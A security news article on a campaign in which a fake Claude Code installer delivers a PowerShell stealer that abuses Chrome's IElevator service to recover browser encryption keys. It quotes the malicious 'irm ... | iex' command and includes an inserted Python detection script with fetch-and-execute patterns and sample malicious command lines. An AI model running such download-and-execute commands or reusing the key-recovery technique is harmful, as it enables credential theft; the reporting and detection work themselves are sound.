Fake Claude Code takes the IElevator to your browser secrets


Developers looking for Anthropic’s increasingly popular Claude Code tool are now being lured into downloading malware.

According to researchers at Ontinue, attackers are abusing a fake Claude Code installer to deliver a previously undocumented PowerShell payload. The malware is designed to evade detection, recover browser encryption material, and steal sensitive data from developer systems.

“Developers hold the keys to an organization’s most sensitive assets – intellectual property, cloud infrastructure, CI/CD pipelines,” said Vineeta Sangaraju, AI Research Engineer at Black Duck. “They also, by necessity, need the freedom to download and install software. That combination makes them a high-value target.”

Ontinue researchers said that every readily detectable step of the attack chain is confined to the PowerShell loader, which leaves the native component with almost nothing for signature-based tooling to match. “Two standard API-chain rule sets we evaluated against the binary returned no matches,” they said in a blog post.

The malware also performs a “geographic exclusion” check: it compares the host’s Windows region settings against a built-in exclusion list, namely all CIS member states plus Iran, and aborts immediately on a match. This is a common stealer trait, and analysis environments can take advantage of it only in reverse, by not using one of those locales if the goal is to observe the payload run.

Campaign replaces Claude Code’s legitimate one-line setup

According to Ontinue, the campaign depends on fake installer pages impersonating Claude Code distribution channels. However, rather than delivering Anthropic’s legitimate one-line installation routine, “irm https[:]//claude[.]ai/install.ps1 | iex,” the pages serve attacker-controlled PowerShell commands (“irm events[.]msft23[.]com | iex”) that initiate a staged payload chain.
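The swap described above is easy to spot in PowerShell Script Block Logging once the download host is checked against a policy. As an added illustration of that detection angle, and not code from Ontinue or this article, the script below scans constructed script-block text (the kind Event ID 4104 records) for fetch-and-execute cradles and reports any whose host is not on an allowlist. It is written in Python so it runs stand-alone; the allowlist, the computer names and every host other than events.msft23.com (which the article names) are assumptions made for the example.

```python
"""Flag PowerShell download-and-execute cradles in script-block logs.

Added example (not Ontinue's or the article's code): scans constructed
PowerShell script-block text for remote-fetch calls whose output is fed to
Invoke-Expression and reports the ones whose host is not on an allowlist.
"""
import re
from urllib.parse import urlsplit

# Hosts developers are expected to pull installers from. Assumed for the
# example; a real allowlist comes from your own software policy.
ALLOWED_HOSTS = {"claude.ai"}

# Cmdlets and aliases that fetch remote content.
DOWNLOADERS = r"\b(?:irm|iwr|Invoke-RestMethod|Invoke-WebRequest|curl|wget)"
# Evaluators that run a string as code.
EVALUATORS = r"(?:iex|Invoke-Expression)\b"
# Optional parameter names before the URL, e.g. -Uri or -UseBasicParsing.
OPTS = r"(?:-\w+\s+)*"
# A URL-ish token; the scheme is optional because `irm host | iex` works without one.
URL_TOKEN = r"(?:https?://)?[A-Za-z0-9.-]+\.[A-Za-z]{2,}(?:/[^\s'\"|)]*)?"

PATTERNS = [
    # irm host/path | iex
    re.compile(
        rf"{DOWNLOADERS}\s+{OPTS}['\"]?(?P<url>{URL_TOKEN})['\"]?[^|\n]*\|\s*{EVALUATORS}",
        re.I,
    ),
    # iex (iwr host/path)
    re.compile(
        rf"{EVALUATORS}\s*\(\s*{DOWNLOADERS}\s+{OPTS}['\"]?(?P<url>{URL_TOKEN})",
        re.I,
    ),
    # (New-Object Net.WebClient).DownloadString('url') | iex
    re.compile(
        rf"DownloadString\(\s*['\"](?P<url>{URL_TOKEN})['\"]\s*\)[^|\n]*\|\s*{EVALUATORS}",
        re.I,
    ),
]


def host_of(url: str) -> str:
    """Lowercase hostname of a URL token, tolerating a missing scheme."""
    if "://" not in url:
        url = "http://" + url
    return (urlsplit(url).hostname or "").lower()


def host_allowed(host: str) -> bool:
    """True if host is an allowlisted domain or a subdomain of one."""
    return any(host == a or host.endswith("." + a) for a in ALLOWED_HOSTS)


def scan_scriptblock(text: str) -> list[dict]:
    """One finding per fetch-and-execute cradle found in a script block."""
    findings = []
    for rx in PATTERNS:
        for m in rx.finditer(text):
            host = host_of(m.group("url"))
            findings.append({"host": host, "url": m.group("url"),
                             "allowed": host_allowed(host), "snippet": m.group(0)})
    return findings


# Constructed stand-ins for Event ID 4104 (Script Block Logging) records.
# events.msft23.com is the host named in the article; the other hosts are invented.
SAMPLE_EVENTS = [
    {"computer": "dev-ws-01", "script_block": "irm https://claude.ai/install.ps1 | iex"},
    {"computer": "dev-ws-02", "script_block": "irm events.msft23.com | iex"},
    {"computer": "dev-ws-03", "script_block": "iex (iwr -UseBasicParsing http://updates.example.test/setup.ps1)"},
    {"computer": "dev-ws-04", "script_block": "Get-ChildItem C:\\src -Recurse | Where-Object { $_.Length -gt 1MB }"},
    {"computer": "dev-ws-05", "script_block": "(New-Object Net.WebClient).DownloadString('http://cdn.example.test/a.ps1') | iex"},
]


def triage(events: list[dict]) -> list[dict]:
    """Alerts for script blocks that fetch and execute code from a non-allowlisted host."""
    alerts = []
    for ev in events:
        for f in scan_scriptblock(ev["script_block"]):
            if not f["allowed"]:
                alerts.append({"computer": ev["computer"], **f})
    return alerts


if __name__ == "__main__":
    for a in triage(SAMPLE_EVENTS):
        print(f"{a['computer']}: fetch-and-execute from {a['host']} :: {a['snippet']}")
```

The cradle syntax is only the first filter; the host is the real signal, which is why the researchers' advice to block newly registered domains complements a rule like this. Note that Invoke-Expression remains available in Constrained Language Mode, so the one-liner itself would still run there; what that mode removes is the arbitrary .NET and COM object access a later stage needs.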

Once executed, the malicious routine deploys multiple components intended to establish persistence while minimizing behavioral indicators typically associated with commodity malware loaders.

“Everything readily detected (SQLite database access, archive construction, HTTPS exfiltration, scheduled-task persistence, and the process-injection chain itself) resides exclusively within the PowerShell loader,” the researchers said, adding that the native helper exposes no networking, cryptographic, or file-enumeration imports.

The only telling sign in the native helper, they noted, is a single indirect COM vtable invocation.

The capabilities Ontinue enumerates, all carried out while keeping a low profile, include geographic exclusion, ID collection, browser enumeration, handling of Chrome’s v10 and v20 key formats, launching a PowerShell process whose architecture matches the host, decryption and collection of browser data, exfiltration, and persistence.

“Swapping a legitimate installer for a malicious one is not a new attack,” Sangaraju pointed out. “However, what makes this ongoing campaign notable is the precision with which it was built to evade the detection methods that most security teams rely on today. The malicious activity is deliberately structured to look benign to scanners.”

Chrome’s Elevation Service was abused to recover encryption keys

The researchers also described the malware abusing Chrome’s Elevation Service to recover the key material behind Application-Bound Encryption (ABE). The payload calls the IElevator2 COM interface exposed by that service to retrieve the ABE key, which the service is designed to hand back only to Chrome itself.

This capability gives the malware access to browser-protected data that is normally out of reach for infostealers. Google introduced ABE in Chrome 127 in July 2024 specifically to stop commodity stealers from lifting cookies and saved passwords out of the browser’s SQLite databases.

Ontinue stopped short of making firm attribution claims, as it found no match with published TTPs associated with popular families such as Lumma, StealC, Vidar, EDDIESTEALER, Katz, VoidStealer, Storm, and XenoStealer, among others. The closest match the researchers found was Glove Stealer, which also abuses IElevator, but they dismissed a direct attribution, citing six differing aspects.

A YARA ruleset and a set of indicators of compromise (IOCs) were shared via GitHub to support detection, and the researchers recommended an additional set of best practices: enforcing PowerShell Constrained Language Mode, enabling phishing-resistant MFA, enabling and verifying AMSI tamper protection, and blocking newly registered domains.
